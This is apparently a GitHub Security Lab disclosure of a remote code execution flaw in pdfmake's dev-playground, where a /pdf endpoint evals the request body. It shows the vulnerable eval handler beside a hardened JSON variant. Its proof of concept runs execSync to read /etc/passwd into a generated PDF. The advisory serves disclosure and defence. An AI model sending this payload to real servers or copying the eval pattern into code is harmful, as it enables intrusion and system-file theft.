Coordinated Disclosure Timeline

Summary

The dev-playground of pdfmake lacks sandboxing/sanitization of the data sent to the server (which flows to eval()).

Product

pdfmake

Tested Version

0.2.5

Details

Issue: RCE in dev-playground.js (GHSL-2022-068)

The /pdf endpoint, which builds a PDF from JavaScript code supplied by the client, neither sanitizes the user input nor runs it in a sandboxed environment:

app.post('/pdf', function (req, res) {
	eval(req.body.content); // untrusted request body executed as JavaScript
	// ... remainder of the handler (PDF generation) omitted
});
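As an added example (not pdfmake's code, and not the fix the project shipped): the handler's eval() shape beside a hardened variant that accepts the document definition as JSON and validates it before anything is rendered. Express and the PDF rendering are left out so both builders run stand-alone on a request body string; the allow-list of top-level keys and the size cap are assumptions for this example.

```javascript
// Vulnerable shape of the playground handler. The body is JavaScript source
// expected to assign a document definition to `dd`, so every other statement
// in it runs with the privileges of the server process.
function buildDocDefinitionUnsafe(body) {
  var dd;
  eval(body); // direct eval: the client's code can assign the local `dd`
  return dd;
}

// Hardened shape: the body is JSON, which JSON.parse turns into data without
// running anything, and the result is checked against an allow-list.
// ALLOWED_KEYS and MAX_BODY_BYTES are assumptions for this example; a real
// deployment would list exactly the keys its renderer uses.
const ALLOWED_KEYS = new Set(['content', 'pageSize', 'pageMargins', 'styles', 'defaultStyle']);
const MAX_BODY_BYTES = 64 * 1024; // bounds memory/CPU spent on one request

function buildDocDefinitionSafe(body) {
  if (typeof body !== 'string' || new TextEncoder().encode(body).length > MAX_BODY_BYTES) {
    throw new Error('body must be a string of at most ' + MAX_BODY_BYTES + ' bytes');
  }
  let dd;
  try {
    dd = JSON.parse(body);
  } catch (e) {
    throw new Error('document definition must be JSON, not JavaScript');
  }
  if (dd === null || typeof dd !== 'object' || Array.isArray(dd)) {
    throw new Error('document definition must be a JSON object');
  }
  for (const key of Object.keys(dd)) {
    if (!ALLOWED_KEYS.has(key)) throw new Error('unexpected top-level key: ' + key);
  }
  if (!Array.isArray(dd.content)) throw new Error('content must be an array');
  return dd;
}

// True when the hardened builder refuses a body (used by the demo below).
function isRejected(body) {
  try { buildDocDefinitionSafe(body); return false; } catch (e) { return true; }
}

// Constructed request bodies: the first is JavaScript in the playground's
// `dd = {...}` style (a benign computation stands in for arbitrary code),
// the second is the same document as JSON.
const SCRIPT_BODY = 'dd = { content: [String(6 * 7)] }';
const JSON_BODY = '{"content": ["42"], "pageSize": "A4"}';
console.log(buildDocDefinitionUnsafe(SCRIPT_BODY).content[0]); // "42": code ran
console.log(isRejected(SCRIPT_BODY), isRejected(JSON_BODY));   // true false
```

The JSON route removes the code-execution primitive entirely; the size cap and key allow-list are what keep a malformed or oversized definition from becoming the resource-consumption issue named under Impact.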

Impact

This issue may lead to a variety of exploit primitives, including Remote Code Execution (RCE) or uncontrolled resource consumption.

Resources

POC

Providing the following snippet will cause pdfmake to dump the contents of /etc/passwd into the generated PDF document:

const {execSync} = require('node:child_process');
var out = execSync('cat /etc/passwd');
dd = {
    content: [
        out.toString()
    ]
}

CVE

Credit

This issue was discovered and reported by GHSL team member @VulnerabilityViper (Ryan Finn).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2022-068 in any communication regarding this issue.